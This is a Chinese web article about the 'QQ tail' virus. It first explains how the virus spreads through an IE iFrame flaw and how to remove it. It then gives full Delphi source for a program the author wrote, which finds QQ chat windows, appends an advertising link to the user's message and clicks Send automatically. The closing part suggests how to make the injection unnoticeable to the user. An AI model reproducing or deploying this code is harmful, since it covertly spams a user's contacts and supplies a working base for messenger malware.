爱华网QQ尾巴病毒这种病毒并不是利用QQ本身的漏洞进行传播。它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。
qq尾巴_QQ尾巴病毒 -病毒主要特征
用户系统如果没安装漏洞补丁或没把IE升级到最高版本,那么访问这些网站的时候其访问的网页中嵌入的恶意代码即被运行,就会紧接着通过IE的漏洞运行一个木马程序进驻用户机器。然后在用户使用QQ向好友发送信息的时候,该木马程序会自动在发送的消息末尾插入一段广告词,通常都是以下几句中的一种。qq尾巴_QQ尾巴病毒 -QQ收到信息如下:
1. HoHo~~http://www.mm**.com刚才朋友给我发来的这个东东。你不看看就后悔哦,嘿嘿。也给你的朋友吧。
2. 呵呵,其实我觉得这个网站真的不错,你看看http://www.ktv***.com/ 3. 想不想来点摇滚粗口舞曲,中华 DJ 第一站,网址告诉你http://www.qq33**.com.。不要告诉别人 ~ 哈哈,真正算得上是国内最棒的 DJ 站点。
4. http//http://www.hudong.com/wiki/www.hao***.com帮忙看看这个网站打不打的开。
5.http://ni***.126.com看看啊。 我最近照的照片~ 才扫描到网上的。看看我是不是变了样?
qq尾巴_QQ尾巴病毒 -清除方法
1.在运行中输入MSconfig,如果启动项中有“sendmess.exe”和“wwwo.exe”这两个选项,将其禁止。在C:WINDOWS一个叫qq32.INI的文件,文件里面是附在QQ后的那几句广告词,将其删除。转到DOS下再将“Sendmess.exe”和“wwwo.exe”这两个文件删除。
2.安装系统漏洞补丁
由病毒的播方式我们知道,“QQ尾巴”这种木马病毒是利用IE的iFrame传播的,即使不执行病毒文件,病毒依然可以借由漏洞自动执行,达到感染的目的。因此应该敢快下载IE的iFrame漏洞补丁。
========================================================
“QQ尾巴”专杀工具
类型: 专杀工具
版本: 2006.2.9.21
大小: 176 KB
语言: 中文
下载地址:http://tool.duba.net/zhuansha/34.shtml
qq尾巴_QQ尾巴病毒 -QQ尾巴病毒的发送原理分析
近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。
QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。
程序实现:首先要找到QQ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。
qq尾巴_QQ尾巴病毒 -一、 如何找到QQ消息发送窗口句柄:
QQ消息发送窗口有两种,一种是消息模式,在这种情况下,窗口标题含有“发送消息”字样;一种是聊天模式,窗口标题含有“聊天中”字样;
通过枚举窗口就可找到相应的句柄:
// 取得QQ的发送消息窗口
function GetQQWnd: HWND;
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow :=GetWindow(Application.Handle, GW_HWNDFIRST);
while hCurrentWindow 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
qq尾巴_QQ尾巴病毒 -二、 如何找到“发送”按钮窗口句柄:
找到了QQ的发送消息窗口后,就可以进一步查找“发送”按钮句柄了,如窗口句柄为qqWnd,则可以用一个循环,查找文本中含有“发送”字样的窗口,经过试验发现,“发送”按钮恰恰是窗体的第一个子窗口,这样,可以用
btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮
来获得“发送”按钮的句柄。
qq尾巴_QQ尾巴病毒 -三、 如何找到消息文本框窗口句柄:
消息文本框并不好找,不过你可以先在消息文本框中输入几个字母,如“abcd”,这样我们就可以用上述方法来查找了,不过通过实验后,发现消息文本框并不是QQ窗口的直接子窗口,而是其中一个子窗口的子窗口,通过实验,可以用
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
来获得。
qq尾巴_QQ尾巴病毒 -四、 如何获得原消息文本框的文本:
要获取原消息文本框的文本,只需要一个API函数就行了,如下:
// 获得窗口文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PCHAR;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
Freemem(mText,Ret);
end;
end;
qq尾巴_QQ尾巴病毒 -五、 如何住原消息文本框里追加文本:
与取文本相反
// 发送文本到窗口
procedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
qq尾巴_QQ尾巴病毒 -六、 如果让“发送”按钮自动点击:
一切都准备好了,现在要开始发送了,为了让消息自动发送,我们可以模拟“发送”按钮被点击了。
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
通过模拟一个鼠标在“开始”按钮上的按下与放开,就实现了点击发送功能。
qq尾巴_QQ尾巴病毒 -七、 其它的定时功能比较简单,在此也不多说了。
qq尾巴_QQ尾巴病毒 -八、 全部源代码如下
:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
Button1: TButton;
Edit1: TEdit;
Label1: TLabel;
Button2: TButton;
procedure Timer1Timer(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// 获得窗口文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
FreeMem(mText,Ret);
end;
end;
// 发送文本到窗口
procedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
// 取得QQ的发送消息窗口
function GetQQWnd: HWND;
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
while hCurrentWindow 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
// 定时处理
procedure TimerProc;
var
qqWnd,txtWnd,btnWnd:HWND;
Msg:String;
begin
qqWnd:=GetQQWnd;
if qqWnd=0 then Exit;
btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
if (btnWnd=0) or (txtWnd=0) then Exit;
Msg:=GetWndText(txtWnd);
Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net';
SetWndText(txtWnd,Msg);
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
TimerProc;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Timer1.Enabled :=not Timer1.Enabled;
if Timer1.Enabled then
Button1.Caption :='停 止'
else
Button1.Caption :='开 始';
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
Timer1.Interval :=StrToInt(Edit1.Text);
end;
end.
qq尾巴_QQ尾巴病毒 -总结:
上面只讲述了QQ消息自动发送的主要功能,这或许跟QQ尾巴的原理不同(我也不知道),但总体上应该差不多。如果要做到让用户感觉不到异常,就要改一下了,不要自动发送,而是在当用户点击了“发送”按钮后再把文本加进去。这样的话可是拦截“发送”按钮的点击消息,然后再用上述方法把文本加进去,然后把消息交还原程序处理。至于如何让它成为病毒,会自我复制,自我隐藏等功能,那又是另外一个话题了,在此就不多讲了。
